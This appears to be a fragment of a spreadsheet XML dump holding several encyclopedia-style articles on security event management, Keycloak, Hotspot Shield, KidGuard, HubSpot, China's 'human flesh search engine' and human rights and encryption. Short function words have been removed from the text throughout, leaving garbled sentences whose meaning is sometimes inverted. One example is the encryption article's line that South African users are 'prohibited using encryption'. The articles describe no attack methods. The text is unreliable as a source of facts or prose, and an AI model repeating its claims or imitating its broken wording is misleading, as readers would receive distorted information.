    <t>security event management (sem), related siem, computer security disciplines data inspection tools centralize storage interpretation logs events generated software running network. overview acronyms sem, siem sometimes used interchangeably, generally refer different primary focus products: management: focus simple collection storage messages audit trails security information management (sim): long-term storage well analysis reporting data. security event manager (sem): real-time monitoring, correlation events, notifications console views. security information event management (siem): combines provides real-time analysis security alerts generated network hardware applications. event logs many systems applications computer network generate events kept event logs. these logs essentially lists activities occurred, records events appended logs occur. protocols, syslog snmp, used transport events, occur, logging software host events generated. better sems provide flexible array supported communication protocols allow broadest range event collection. beneficial send events centralized system following reasons: access logs provided consistent central interface. provide secure, forensically sound storage archival event logs (this also classic management function). powerful reporting tools mine logs useful information. events parsed significance, alerts notifications immediately sent interested parties warranted. related events occur multiple systems detected would difficult detect system separate log. events sent system remain even sending system fails logs accidentally intentionally erased. security analysis although centralised logging existed long time, sems relatively idea, pioneered 1999 small company called e-security, still evolving rapidly. feature security event management tool ability analyse collected logs highlight events behaviors interest, example administrator super user logon, outside normal business hours. this include attaching contextual information, host information (value, owner, location, etc.), identity information (user info related accounts referenced event like first/last name, workforce manager's name, etc.), forth. this contextual information leveraged provide better correlation reporting capabilities often referred meta-data. products also integrate external remediation, ticketing, workflow tools assist process incident resolution. better sems provide flexible, extensible integration capabilities ensure work customer environments. regulatory requirements sems often sold help satisfy u.s. regulatory requirements sarbanes–oxley, pci-dss, glba. standardization major problems space difficulty consistently analyzing event data. every vendor, indeed many cases different products vendor, uses different proprietary event data format delivery method. even cases "standard" used part chain, like syslog, standards typically contain enough guidance assist developers generate events, administrators gather correctly reliably, consumers analyze effectively. attempt combat problem, couple parallel standardization efforts underway. first, open group updating circa 1997 xdas standard, never made past draft status. this effort, dubbed xdas attempt formalize event format including data included events expressed. xdas standard include event delivery standards standards development distributed management task force provide wrapper. addition, mitre developed efforts unify event reporting common event expression (cee) somewhat broader scope attempted define event structure well delivery methods. project, however, funding 2014. also computer security incident management security information management comparison network monitoring systems security information event management references external links siem analytics list siem event manager tools</t>
  </si>
  <si>
    <t>Keycloak</t>
  </si>
  <si>
    <t>keycloak open source software product allow single sign-on identity access management aimed modern applications services. march 2018 wildfly community project stewardship upstream project rh-sso product. history first production release keycloak september 2014, development started year earlier. 2016 switched product based picketlink framework based keycloak upstream project. this followed merging picketlink codebase keycloak.to extent keycloak also considered replacement jboss open source product previously superseded picketlink. march 2018 jboss.org redirecting jbosssso subsite keycloak website. jboss name registered trademark moved upstream open source projects names avoid using jboss, jboss wildfly commonly recognized example. features features keycloak include: user registration social login single sign-on/sign-off across applications belonging realm two-factor authentication ldap integration kerberos broker multitenancy per-realm customizable skin components there main components keycloak: keycloak server, including graphical interface. keycloak application adapter: libraries call server. also single sign-on (sso) openam kerberos (protocol) identity management list single sign-on implementations single sign-on references external links official website sébastien blanc (june 2017). "easily secure your spring boot applications with keycloak". dzone.com. free keycloak tutorials</t>
  </si>
  <si>
    <t>Hotspot Shield</t>
  </si>
  <si>
    <t>hotspot shield public service operated anchorfree, inc. establishing encrypted connection hotspot shield servers, service protects users' internet traffic eavesdropping. hotspot shield used bypass government censorship arab spring protests egypt, tunisia, libya. overview hotspot shield developed operated dnick (former anchorfree inc.), company chester county offices ukraine russia. first hotspot shield client released april 2008 windows macos operating systems. expanded include support android 2011 2012, respectively.the hotspot shield client establishes encrypted connection supported public servers, user connect internet. connection protects traffic user server eavesdropping, address client exposed. while service cannot make users completely anonymous internet, greatly increase privacy security. users bypass censorship using hotspot shield connecting server located outside country. both client software service freemium: main features client app, well number public servers available free charge, users additional features, include elimination advertisements, antivirus protection, connecting servers choosing geographic location service connect. international hotspot shield used bypass internet censorship countries strict internet censorship programs. during arab spring protests 2010, protesters used hotspot shield access social networking tools communicate upload videos. hotspot shield also widely used egyptian protests revolution 2011, mubarak regime cracked heavily access social media sites. 2013, usage hotspot shield increased turkey, response suspected efforts turkish government censor social media citizen access international websites. 2014, usage hotspot shield increased hong kong outbreak 2014 hong kong protests.in 2012, hotspot shield usage increased among users united states europe, 500,000 users infected flashback virus. hotspot shield used protection virus. critical reception hotspot shield generally received positive reviews industry publications websites. magazine rated software "excellent" praised status indicator, traffic encryption, connection speed times payment flexibility, criticized software's platform, website code injection, slowdown overall response time browser setting modifications.in august 2017, center democracy technology issued open complaint federal trade commission state "concerns undisclosed unclear data sharing traffic redirection occurring hotspot shield free considered unfair deceptive trade practices section act." "partnered researchers carnegie mellon university analyze service found 'undisclosed data sharing practices' advertising networks."in february 2018, security researcher discovered information disclosure results leak user data, country user located, user's wi-fi network name, connected. also comparison virtual private network services references</t>
  </si>
  <si>
    <t>KidGuard</t>
  </si>
  <si>
    <t>kidguard parental monitoring application android mobile phones. application uses proprietary software help parents monitor children’s text messages, browser history, social media activity, stored videos photos, emails, phone location. history kidguard developed angeles-based team officially released 2016. after kidguard's launch, application received coverage news inc. magazine.in 2017, kidguard partnered startup incubator onramp lab, located taipei, taiwan. year, international security consultant gene joined kidguard advisory board kidnapping response prevention measures.in 2020, kidguard victim data breach released customer data. features following software service model, kidguard application allows parent view activity child's phone, including: reading sent received text messages, including deleted messages texts sent popular alternative messaging applications whatsapp. accessing browser history, call history application usage, including duration frequency. viewing photos videos saved child's phone, using smartphone's track location, well setting geo-fencing alert parents.kidguard also includes feature calls "situation report," application automatically creates report enforcement event child's disappearance. report includes full profile child's recent locations, behavior message history. controversy critics raised concerns potential capability kidguard competitors violate privacy laws used tool stalkers abusers.in 2018, kidguard featured york times article criticized application's developers running advertisements aimed adults attempting spouses discover infidelity. after kidguard contacted comment, spokesman responded advertisements developed marketing partner. content relating infidelity subsequently removed kidguard website. philanthropy kidguard maintains annual "kidguard education essay scholarship" high school students united states. scholarship awarded undisclosed number participants, based results essay content whose topics concern online safety cyberbullying.in 2017, kidguard donated $25,000 grants non-profit organizations focused child safety online threat prevention. largest grant $5,000 awarded megan meier foundation. also parental controls mspy references external links kidguard official website woocommerce mobile</t>
  </si>
  <si>
    <t>HubSpot</t>
  </si>
  <si>
    <t>hubspot american developer marketer software products inbound marketing, sales, customer service. hubspot founded brian halligan dharmesh shah 2006. products services provide tools customer relationship management, social media marketing, content management, lead generation, analytics, search engine optimization, live chat, customer support. history hubspot founded brian halligan dharmesh shah massachusetts institute technology (mit) 2006.the company grew $255,000 revenues 2007, $15.6 million 2010. later year hubspot acquired oneforty, twitter store founded laura fitton. company also introduced software personalizing websites visitor. according forbes, hubspot started targeting small companies "moved steadily upmarket serve larger businesses 1000 employees." hubspot filed initial public offering securities exchange commission august 2014, requesting listed york stock exchange ticker symbol hubs. they raised $140 million selling shares apiece. stock exploded since, hitting all-time high $841.26 november 12th, 2021. july 2017, hubspot acquired kemvi, applies artificial intelligence machine learning help sales teams. company reported revenues billion 2021.in february 2021, axios reported hubspot would acquiring hustle, content email newsletter company focused small business owners entrepreneurs.in september 2021, hubspot announced yamini rangan ceo, brian halligan stepped role became executive chairman company. software services hubspot marketing software provides tools social media marketing, content management, analytics, landing pages, customer support, search engine optimization. hubspot integration features salesforce.com, sugarcrm, netsuite, microsoft dynamics crm, others. there also third-party services templates, extensions. additionally, hubspot offers consulting services online resource academy learning inbound marketing tactics. also hosts user group conferences inbound marketing certification programs. hubspot promotes inbound marketing concepts marketing, called prolific creator content" blogs, social media, webinars white papers.in 2010, article harvard business review said hubspot's effective inbound marketing feature free online tools. tool, marketing grader, assessed scored website performance. company introduced twitter tracking feature 2011.in november 2016, hubspot launched hubspot academy, online training platform provides various digital marketing training programs.in 2018, hubspot integrated taboola dashboard, global pay-per-click native network.in november 2019, hubspot acquired piesync, customer data synchronization platform. hubspot free company launched hubspot free 2014. product tracks manages interactions company customers prospects. enables companies forecast revenue, measure sales team productivity, report revenue sources. software service product free integrates gmail, suite, microsoft office windows, software. tech industry reviews hubspot described unique strives provide customers all-in-one approach. 2012 review search said hubspot best business solution category, taken whole, best "marketing solution" combined many tools package. identified hubspot's "strengths" sophistication call action (marketing) tool, online ecosystem, "ease use". weakness described "more breadth depth". review said lack customization design tools could limiting missing advanced features business process management (bpm) tools manage workflow. conferences hubspot hosts annual marketing conference hubspot users partners called "inbound". event typically located boston. 2019, hubspot hosted largest conference event's history, record 26,000 attendees countries. first inbound conference took place 2012. since then, speakers michelle obama, notaro, issa spoken events. controversy july 2015, hubspot's cmo, mike volpe, dismissed violating hubspot's code business conduct. found tried obtain draft copy book disrupted: misadventure start bubble, written former employee daniel lyons. according article boston globe, records obtained freedom information indicated hubspot executives considered book financial threat hubspot" volpe used "tactics email hacking extortion" attempt prevent book published.in april 2016, book published, lyons wrote york times hubspot "frat house" atmosphere. also called company "digital sweatshop" workers little security. later month, hubspot's founders gave official response book, addressed several, all, lyons' claims. reception boston business journal named hubspot "best place work 2012". 2015, company named best large company work massachusetts boston globe. 2017, hubspot named seventh cnbc best places work. glassdoor named hubspot best place work 2020. references further reading lyons, daniel (2016). disrupted: misadventure start bubble. hachette books. isbn 978-0316306089. halligan, brian; david meerman scott; dharmesh shah (2010). inbound marketing: found using google, social media blogs. john wiley sons, inc. isbn 978-0-470-49931-3. external links official website business data hubspot:</t>
  </si>
  <si>
    <t>Human flesh search engine</t>
  </si>
  <si>
    <t>human flesh search engine (chinese: 人肉搜索; pinyin: rénròu sōusuǒ) chinese term phenomenon distributed researching using internet media blogs forums. internet media, namely dedicated websites internet forums, fact platforms enable broadcast request action plans concerning human flesh search allow sharing online offline search results. human flesh search eminent characteristics. first, involves strong offline elements including information acquisition offline channels types offline activism. second, always relies voluntary crowd sourcing: users gather together share information, conduct investigations, perform actions concerning people events common interest.human flesh search engine similar concept "doxing." both human flesh search engine doxing generally stigmatized purpose identifying exposing individuals public humiliation, sometimes vigilantism, nationalist patriotic sentiments, break internet censorship people's republic china. more recent analyses, however, shown also used number reasons, including exposing government corruption, identifying drivers, exposing scientific fraud, well "entertainment"-related items identifying people seen pictures. categorization hundreds human flesh search (hfs) episodes found 2010 ieee computer society paper study human flesh search engine: crowd-powered expansion online knowledge.the system based massive human collaboration. name refers knowledge contributed human beings social networking, fact searches usually dedicated finding identity human committed sort offense social breach online. people conducting research commonly referred collectively "human flesh search engines". because convenient efficient nature information sharing cyberspace, human flesh search often used acquire information usually difficult impossible find conventional means (such library search engines). such information, available, rapidly distributed hundreds websites, making extremely powerful mass medium. purposes human flesh search vary providing technical/professional support, revealing private/classified information specific individuals organizations (therefore breaching internet confidentiality anonymity). because personal knowledge unofficial (sometimes illegal) access frequently depended upon acquire information, reliability accuracy searches often vary. etymology term originated forums 2001, coined describe search human-powered rather computer-driven". original human flesh search engine subforum similar question-and-answer (q&amp;a) site, focusing entertainment-related questions. gradually, definition term evolved search humans, also search humans. history early human flesh search dated back march 2006, netizens tianya club collaborated identify internet celebrity named "poison" (simplified chinese: traditional chinese: pinyin: dúyào). found high-level government official. however, fei-yue wang state earliest search 2001, "when user posted photo young woman chinese online forum..., claimed girlfriend." eventually identified minor celebrity initial claim discredited.over years, human flesh search repeatedly deployed, sometimes fueling moral crusades socially unacceptable behaviors, political corruption, extramarital affairs, animal cruelties perceived betrayal/hostilities towards chinese nation. individuals receiving often real-life identities private information made public, subjected harassment hate mails/calls, death threats, graffiti social humiliation. organizations subjected coordinated cyber-attacks. human flesh search engine also deployed amusement. johan lagerkvist, author after internet, before democracy: competing norms chinese media society, said little fatty meme, pictures teenager photoshopped film posters without boy's permission, demonstrated human flesh search engine "can also directed society's subaltern powerless" "[t]his raises important issues legitimate right privacy, defamation, slander."the baojia system community rule-of-law ancient china bears strong similarities human flesh search. both based form vigilantism. stance people's republic china december 2008, people's court beijing called alarming phenomenon implications "cyberviolence" violations privacy law.on hand, human flesh search netizens manifestation freedom speech. also supervisory right given article chinese constitution. hand, human flesh search leads disclosure ordinary people's names, identities, family addresses personal data. chinese government official stance human flesh search engines violate privacy laws. some local governments made human flesh search engines illegal stating posting private information another result fine 5000rmb. all, chinese government little punish cases; might even government encourages allowing widespread behavior unchecked. from march 2020, people’s republic china’s "regulations ecological governance online information content" implemented, clarifying users producers online information content services platforms must engage online violence, doxing, deep forgery, data fraud, account manipulation illegal activities film television caught 2012 film chen kaige explores fictional instances human flesh search engine. television series robot, mysterious group known dark army elements based phenomenon. season episode order titled "human flesh search engine". web-based platform designed pool knowledge efforts internet sleuths premise program wisdom crowd. searching 2018 american thriller film human flesh search. snow white murder case presents tragedy human flesh search. 2009 chinese film invisible killer related human flesh search. human flesh search engine chinese documentary released july 2009. notable examples south china tiger photograph claims: 2007, hunter shaanxi province, china, claimed encountered live wild south china tiger, long considered extinct natural environments. photos taken later published science magazine (“rare-tiger photo flap makes china”). wide circulation photos triggered wave authentication among users. leveraged expertise diverse domains ranging zoology, botany, photography geometry. finally, participant successfully identified origin images: calendar cover painting, hunter used forge claimed south china tiger pictures. human flesh search ended proving photos fake 'exciting' discovery scam. zhang ya's earthquake video: 2008, earthquake magnitude swept sichuan, china, killing approximately 87,587 people. response quake, video insulting victims published youtube anonymous female user. after nationwide outrage, human flesh search engine identified girl zhang doxing uploading personal information online. gang incident: october 2010, drunk-driving student pair university students driving inside hebei university, fatality, reported shouted “sue dare, gang!” apprehended. following spread news chinese internet forums, driver's identity revealed qiming, deputy director local public security bureau. doxed driver west china: march 2013, driver ürümqi, china rolled window spit elderly homeless person lying street. witnesses recorded first digits license plate. brief broadcast local radio quickly caused stir internet furious netizens doxxed feng, part-time taxi driver ürümqi, several hours later harassing calls blackmails. also outing internet vigilantism hacktivism china brain mass collaboration references further reading cheong, gong, (2010) “cyber vigilantism, transmedia collective intelligence, civic participation”, chinese journal communication, 3(4), 471-487. lennon y.c. chang ryan poon (2016) “internet vigilantism: attitudes experiences university students hong kong”, international journal offender therapy comparative criminology. (doi: 10.1177/0306624x16639037) lennon chang andy leung (2015) introduction cyber-crowdsourcing (human flesh searching) greater china region” smith, cheung, lau, (eds) cybercrime risks responses: eastern western perspectives (pp, 240-252). palgrave. bing wang, bonan hou, yiping yao, laibin yan. human flesh search model incorporating network expansion gossip feedback. 2009 13th ieee/acm international symposium distributed simulation real time applications (ds-rt 2009): 82-88. mackinnon, rebecca (february 2009). "from guards cyber-vigilantism next?". rconversation. capone, vincent. human flesh search engine: democracy, censorship, political participation twenty-first century china. scholarworks university massachusetts boston. 2010. levine, jessi. [1]. what 'human flesh search,' changing china? atlantic. 2012. external links 'human flesh search engines’ their sights official misbehavior canaves, wall street journal, december 2008 tvo's search engine podcast human flesh search engine absence fair open judicial system, chinese netizens become digital vigilantes. august 2009 human flesh search engine research blog</t>
  </si>
  <si>
    <t>Human rights and encryption</t>
  </si>
  <si>
    <t>human rights applied encryption concept freedom expression encryption technical resource implementation basic human rights. with evolution digital age, application freedom speech becomes controversial technologies restrictions arise, along governmental commercial interests. from human rights perspective, growing awareness encryption core component realizing free, open trustworthy internet.human rights moral principles norms describe certain standards human behavior regularly protected legal rights municipal international law. they commonly understood inalienable fundamental rights person inherently entitled simply human being", "inherent human beings" regardless nationality, location, language, religion, ethnic origin status. they applicable everywhere every time sense universal, egalitarian sense everyone.cryptography long-standing subject field mathematics computer science. generally defined "the protection information computation using mathematical techniques." oecd guidelines, encryption cryptography defined follows: "encryption" means transformation data cryptography produce unintelligible data (encrypted data) ensure confidentiality. "cryptography" means discipline embodies principles, means, methods transformation data hide information content, establish authenticity, prevent undetected modification, prevent repudiation, and/or prevent unauthorized use. encryption cryptography often used synonymously, although "cryptographic" broader technical meaning. example, digital signature "cryptographic", technically "encryption".the human rights aspects related availability technology particular significance field information communication recognised many places. freedom expression recognized human right article universal declaration human rights recognized international human rights international covenant civil political rights (iccpr). article udhr states "everyone shall right hold opinions without interference" "everyone shall right freedom expression; right shall include freedom seek, receive impart information ideas kinds, regardless frontiers, either orally, writing print, form art, media choice". overview since 1970s, availability digital computing invention public-key cryptography made encryption widely available. previously, strong versions encryption domain nation state actors. however, since year 2000, cryptographic techniques widely deployed various actors ensure personal, commercial public sector protection information communication. cryptographic techniques also used protect anonymity communicating actors protecting privacy generally. availability encryption continues lead complex, important highly contentious legal policy debates. there government statements proposals need curtail usage deployment view potential hurdles could present access government agencies. rise commercial services offering end-to-end encryption calls restrictions solutions view enforcement access pushing towards debates around encryption legal status deployment cryptography generally.encryption, defined above, refers subset cryptographic techniques protection information computation. normative value encryption, however, fixed varies type cryptographic method used deployed purposes. traditionally, encryption (cypher) techniques used ensure confidentiality communications prevent access information communications others intended recipients. cryptography also ensure authenticity communicating parties integrity communications contents, providing ingredient enabling trust digital environment.there growing awareness within human rights encryption plays important role realizing free, open trustworthy internet. special rapporteur promotion protection right freedom opinion expression david kaye observed, human rights council june 2015, encryption anonymity deserve protected status rights privacy freedom expression: "encryption anonymity, today's leading vehicles online security, provide individuals means protect privacy, empowering browse, read, develop share opinions information without interference enabling journalists, civil society organizations, members ethnic religious groups, persecuted sexual orientation gender identity, activists, scholars, artists others exercise rights freedom opinion expression." encryption media communication types encryption media communication distinguished: encryption media communication could used result choice service provider deployed internet users. client-side encryption tools technologies relevant marginalized communities, journalists online media actors practicing journalism becomes protecting rights. encryption provided service providers prevent unauthorized third party access, service provider implementing would still access relevant user data. end-to-end encryption encryption technique refers encryption also prevents service providers access user's communications. implementation forms encryption sparked debate since year 2000. service provider deployed techniques prevent unauthorized third-party access amongst widely deployed cryptographic techniques securing communications channel internet users specific service providers man-in-the-middle attacks, access unauthorized third parties. these cryptographic techniques must jointly user service provider work. this means require service providers, online news publisher social network, actively integrate service design implementation. users cannot deploy techniques unilaterally; deployment contingent active participation service provider. protocol, becomes visible normal internet user https header, widely used securing online commerce, e-government services health applications well devices make networked infrastructures, e.g., routers, cameras. however, although standard around since 1990, wider spread evolution technology slow. cryptographic methods protocols, practical challenges related proper, secure (wider) deployment significant considered. many service providers still implement implement well.in context wireless communications, cryptographic techniques protect communications third parties also important. different standards developed protect wireless communications: standards communication mobile phones, base stations base stations controllers; standards protect communications mobile devices wireless routers ('wlan'); standards local computer networks. common weakness designs transmission points wireless communication access communications e.g., telecommunications provider. this vulnerability exacerbated wireless protocols authenticate user devices, wireless access point.whether data stored device, local server cloud, also distinction rest'. given vulnerability cellphones theft instance, particular attention given limiting service provided access. this exclude situation service provider discloses information third parties like commercial entities governments. user needs trust service provider interests. possibility service provider legally compelled hand user information interfere particular communications particular users, remains. privacy enhancing technologies there services specifically market claims access content users' communication. service providers also take measures restrict ability access information communication, increasing protection users access information communications. integrity privacy enhancing technologies (pets), depends delicate design decisions well willingness service provider transparent accountable. many services, service provider offer additional features (besides ability communicate), example contact list management—meaning observe communicating whom—but take technical measures cannot read contents messages. this potentially negative implications users, instance, since service provider take action connect users want communicate using service, also power prevent users communicating first place.following discovery vulnerabilities, growing awareness needs investment auditing widely used code coming free open software community. pervasiveness business models depend collection processing user data obstacle adopting cryptographic mechanisms protecting information rest. bruce schneier, stated:"[s]urveillance business model internet. this evolved shockingly extensive, robust, profitable surveillance architecture. tracked pretty much everywhere internet, many companies data brokers: different companies site, dozen another." cryptographic methods play role online identity management.digital credential systems used allow anonymous authenticated accountable transactions users service providers, used build privacy preserving identity management systems. end-user community-driven encryption collaborative services internet allows end-users develop applications uses network without coordinate relevant internet service providers. many available encryption tools developed offered traditional service providers organizations experts free open software (foss) internet engineering communities. major focus initiatives produce privacy enhancing technologies (pets) unilaterally collaboratively deployed interested users ready, willing, able look privacy interests interacting service providers. these pets include standalone encryption applications well browser add-ons help maintain confidentiality web-based communications permit anonymous access online services. technologies keystroke loggers intercept content entered encryption applied, thereby falling short offering protection. hacking information systems devices access data moment decryption effect.multi-party computation (mpc) techniques example collaboration|collaborative solutions allow parties, e.g. ngos sensitive data, data analytics without revealing datasets other. designs leverage encryption provide privacy security assurances absence trustworthy centralized authority.there many developments implementations crypto-currencies using blockchain protocols. these systems many benefits protocols also useful novel forms contracts electronic attestation, useful aids legal infrastructure readily available. protection privacy related payments, common misconception cryptographic techniques used bitcoin ensure anonymous payments. protection offered bitcoin pseudonymity. cryptographic protection metadata availability metadata (the information relating user's information communications behavior) pose particular threat users including information observed service providers provisioning services: when, frequently, long, users communicating. metadata also used track people geographically interfere ability communicate anonymously. noted berkman center report, metadata generally encrypted ways make inaccessible governments, accordingly "provides enormous amount surveillance data unavailable [internet communication technologies] became widespread." minimize exposure meaningful metadata, encryption tools need used combination technologies provide communication anonymity. onion router onion router, commonly known tor, offers ability access websites online services anonymously. requires community volunteers intermediary proxies channel user's communication website third parties cannot observe user communicating with. through encryption, proxy aware part communication path meaning none proxies infer user website visiting. besides protecting anonymity, also useful user's blocks access content. this similar protection offered vpn. service providers, websites, block connections come network. because certain malicious traffic reach service providers traffic traffic also interfere business models, service providers incentive this interference prevent users using effective means protect anonymity online. browser allows users obfuscate origin end-points communications communicate internet. obfuscation obfuscation, automated generation "fake" signals indistinguishable users' actual online activities, providing users noisy "cover" real information communication behavior remains unobservable. obfuscation received attention method protect users online recently. trackmenot obfuscation tool search engine users: plugin sends fake search queries search engine, affecting ability search engine provider build accurate profile user. although trackmenot search obfuscation tools found vulnerable certain attacks allow search engines distinguish user-generated computer-generated queries, advances obfuscation likely play positive role protecting users disclosure information inevitable, case search location-based services. cryptography, human rights restrictions cryptographic techniques recent incidents terrorism calls restrictions encryption. even though, interest public safety, many proposals interfere free deployment strong encryption, proposals hold close scientific scrutiny. these proposals side-step fundamental point, related stake users. more advanced security measures seem necessary governments, considering existing threat landscape users digital communications computing.while many governments consider encryption techniques could present hurdle investigation crime protection national security, certain countries, germany netherlands taken strong position restrictions encryption internet. 2016, ministers interior france germany jointly stated need work solutions challenges enforcement face result end-to-end encryption, particular offered foreign jurisdiction. joint statement, european agency network information security (enisa) europol also taken stance introduction backdoors encryption products. addition, restrictions would serious detrimental effects cyber security, trade e-commerce. encryption law: broader landscape privacy data protection legislation closely related protection human rights. there countries data protection laws. principles fair lawful processing personal information regulated data protection laws principle security. this principle implies proper security measures taken ensure protection personal data unlawful access others intended recipients. european union general data protection regulation, adopted 2016 enter force 2018, contains advanced rules respect security personal data.encryption safeguard personal data breaches facilitate implementation privacy data protection design. cryptography also essential ingredient establishing conditions e-commerce internet. oecd principles adopted ensure national cryptography policy would interfere trade ensure conditions international developments e-commerce. international cryptography policy human rights policy debate encryption significant international dimension international nature communications networks internet well trade, globalization national security dimensions. oecd adopted recommendation concerning guidelines cryptography policy march 1997. there three components policy intervention oecd, primarily aimed member countries: recommendation oecd council, guidelines cryptography policy annex recommendation) report background issues cryptography policy explain context guidelines basic issues involved cryptography policy debate. principle explicit connection human rights principle protection privacy personal data: "the fundamental rights individuals privacy, including secrecy communications protection personal data, respected national cryptography policies implementation cryptographic methods."unesco, consulting stakeholders, identified encryption relevant element policy privacy freedom expression. keystones report (2015) articulates extent data considered representative ourselves, encryption role play protecting are, preventing abuse user content. also allows greater protection privacy anonymity transit ensuring contents (and sometimes also metadata) communications seen intended recipient." report recognizes "the role anonymity encryption play enablers privacy protection freedom expression", proposes unesco facilitate dialogue issues.the necessary proportionate principles developed adopted civil society actors stipulates protection integrity communications systems principles. principles provide explicit guidance specific cryptographic policy issues backdoors restrictions deployment encryption. guidance offered oecd principles recent positions rapporteur encryption state importance encryption protection human rights. while give definitive answer question whether mandate encryption backdoors considered incompatible international law, point direction. generally, available guidance international level clarifies limitations imposed encryption, relevant human rights guarantees strictly observed. national level developments selected countries united states there broad, active contentious policy debate encryption since 1990s beginning 'crypto wars'. this involved adoption communications assistance enforcement (calea), containing requirements telecommunications providers equipment manufacturers ensure possibility effective wiretapping. also involved debate existing export controls strong encryption products (considering classification munition) criminal investigation cryptographic email software developer activist phil zimmermann. case dropped general debate resolved liberalization export controls commercial products strong encryption features transfer items u.s.a. munitions list (usml), administered department state, commerce control list (ccl), administered department commerce. department commerce maintains controls items ccl, including registration, technical reviews reporting obligations, continues impose licensing requirements sensitive encryption items sales items foreign governments.the debate ignited edward snowden revelations well-documented increase deployed encryption measures internet services, device makers users, well concerted call technical community civil society increase encryption security address mass surveillance practices. increased adoption encryption industry received critically certain government actors, particular. this widely reported fbi–apple encryption dispute possibility gain access information iphone assistance enforcement. 2016, several bills introduced congress would place limits encryption law. usa's legal system promotes requires security measures implemented relevant contexts, including cryptographic methods various kinds, ensure security commerce trade. relevant laws federal information security modernization (fisma) 2014, gramm-leach-bliley act, health insurance portability accountability (hipaa) also federal trade commission act. these acts contain security requirements thereby indirectly require stimulate encryption certain circumstances. finally, many state breach notification laws treat encrypted data safe harbor exempting firms encrypted data notice obligations.constitutional considerations human rights play role significance debate legal treatment encryption methods. restrictions distribution cryptographic protocols, publication cryptographic methods considered interference first amendment, constitutional safeguard protecting freedom expression. particularly active strongly developed civil society actors involved cryptographic policy practice. united states america primary site cryptology research engineering, development implementation cryptographic service innovations. there active community non-governmental organizations engaged national international debate encryption policy. predominant interferences strong encryption take place considered take place field national security, enforcement foreign affairs. area answering contentious question whether lawful access specific communications could ensured, government internationally explained policy aiming ensure 'responsibly deployed encryption' helps "secure many aspects daily lives, including private communications commerce", also ensure malicious actors held account without weakening commitment strong encryption". germany part global debate encryption late 1990s, debate also took place germany need legitimacy imposing general encryption communications impact criminal investigations. there profound doubts concerning constitutional legitimacy well concerns negative factual consequences ban. qualitative terms, number fundamental rights considered affected restrictions encryption: secrecy telecommunications, expressions general right personality and, indirectly, communicative freedoms exercisable internet. federal government points 1999 german cryptographic policy especially provide confidence security encryption instead restricting besides statements german minister interior towards possible future restrictions, germany aligns position special rapporteur david kaye adopts policies non-restriction comprehensive protection adopts restrictions case-specific basis. november 2015 governmental representatives well representatives private sector signed "charter strengthen trusted communication "(charta stärkung vertrauenswürdigen kommunikation) together, stated: want encryption site world". german government also used foreign policy promote international privacy standards. particular, germany, joint effort brazil, committed human rights council appointment special rapporteur privacy. there multiple examples efforts government implement encryption policy. they range informal actions, laws regulations: security 2015, 'de-mail' law. there also several sector-specific rules encryption information security germany, like telecommunications (tkg). german constitutional court also provided valuable input international legal handling encryption techniques basic right, which, constitutional court recognizes parts one's personality systems therefore applied protection travel india there number limitations free deployment encryption electronic communications services despite fact indian policy promotes requires implementation strong encryption security measure, banking, ecommerce organizations handling sensitive personal information. there notable legal uncertainty precise legal scope license requirements extent could legal effect (the deployment services end-users covered services. encryption debate ignited publicly india 2008 government published draft proposal number envisioned limitations encryption. policy, issued section indian information technology (amendment) act, 2008 short-lived, worries remain lack safeguards privacy freedom expression draft illustrated. response outcry, indian government first exempted "mass encryption products, currently used applications, social media sites, social media applications whatsapp, facebook, twitter etc." soon thereafter, withdrew proposed policy policy made public yet.section indian information technology (amendment) act, 2008 empowers government formulate rules modes encryption electronic medium. legal commentators noted lack transparency types encryption deployment permitted required indian law, especially field electronic communications services. thus, central indian government has, theory, broad exclusive monopoly electronic communications includes privilege provide telecommunication internet services india. brazil after edward snowden revelations 2013, brazil forefront global coalition promoting right privacy condemning mass surveillance. recent events, brazil demonstrated diverse aims comes implementation encryption. side, country leader providing legal framework rules internet. also taken several measures seen restrict dissemination encryption technology. 2015, process open public comments discussions, brazil's legislator drafted privacy bill ("proteção dados pessoais"), sent brazil's federal congress 2016 came force bill 5276 2016. regulates protects personal data privacy, including online practices includes provisions secure methods encryption treatment personal data. also addresses security issues duty companies report attacks security breaches. with marco civil (2014), introduces principles like neutrality, brazilian civil rights framework internet, brazil first countries ever introduce law, aims combining internet rules bundle. brazil well-established e-government model: brazilian public infrastructure (infraestrutura chaves públicas brasileira icp-brasil). since 2010 icp-brasil certificates partly integrated brazilian ids, used several services like revenue service, judicial services bank related services. practice, icp-brasil digital certificate acts virtual identity enables secure unique identification author message transaction made electronic medium web. brazilian courts taken stance encryption private messaging services repeatedly ordering blocking messaging service whatsapp. since switched full end-to-end encryption, service periodically blocked result court order attempt make company comply demands information. african countries african (banjul) charter human people's rights, adopted context african union 1981. protocol charter, establishing african court human peoples' rights adopted 1998 came effect 2005. area information policy, african union adopted african union convention cyber security personal data protection. provisions personal data protection convention generally follow european model protection data privacy contains number provisions security personal data processing. civil society initiative adopted specific african declaration internet rights freedoms help shape approaches internet policy-making governance across continent". northern africa different countries north-african region seen significant rise legal actions aiming suppression encryption transformations started 2011. although legislation often dates back transformations, enforcement become stricter since then. difference position towards cryptography seen countries successful revolutions went regime changes didn't.tunisia several laws limit online anonymity. articles 2001 telecommunication code encryption provide sanction five years prison unauthorized sale techniques.in algeria, users legally needed authorization cryptographic technology relevant telecommunications authority arpt (autorité régulation poste télécommunications) since 2012.in egypt, article 2003 telecommunication regulation states encryption devices prohibited without written consent ntra, military, national security authorities.in morocco, import export cryptographic technology, soft- hardware, requires license government. relevant 53-05 (loi 53-05 relative l'échange électronique données juridiques) went effect december 2007. east africa there specific provisions effect countries east-african region restricting encryption technology. african countries, main reason given state surveillance prevention terroristic attacks. kenya proximity somalia, cited threat adopting restrictive actions. country recently fast-tracked computer cybercrime law, adopted 2016. uganda number laws policies passed past three years, none however deal encryption. 2016, following presidential elections, ugandan government shut social networks twitter, facebook whatsapp. west africa west-african countries neither limit import export encryption technology, use, national foreign companies still rely vpns communication. ghana recently introduced draft aiming intercepting electronic postal communications citizens, crime prevention. section 4(3) proposed bill gives government permission intercept anyone's communication upon receiving oral order public officer. recently nigerian communications commission drafted bill regarding lawful interception communications regulations. passed, bill allows interception communication without judicial oversight court order forces mobile phone companies store voice data communication three years. furthermore, draft plans give national security agency right decrypt encrypted communication. southern africa users south africa prohibited using encryption. provision technology, however, strictly regulated electronic communications transactions act, 2002. central africa countries central africa, like democratic republic congo, central african republic, gabon cameroon well-developed legal framework addressing internet policy issues. internet remains relatively unregulated sphere. human rights legal framework related cryptography international instruments while broad range human rights touched upon digital technologies, human rights freedom expression (art. international covenant civil political rights [iccpr]) right private life (art. iccpr) particular relevance protection cryptographic methods. unlike universal declaration human rights (udhr) international 'soft law', 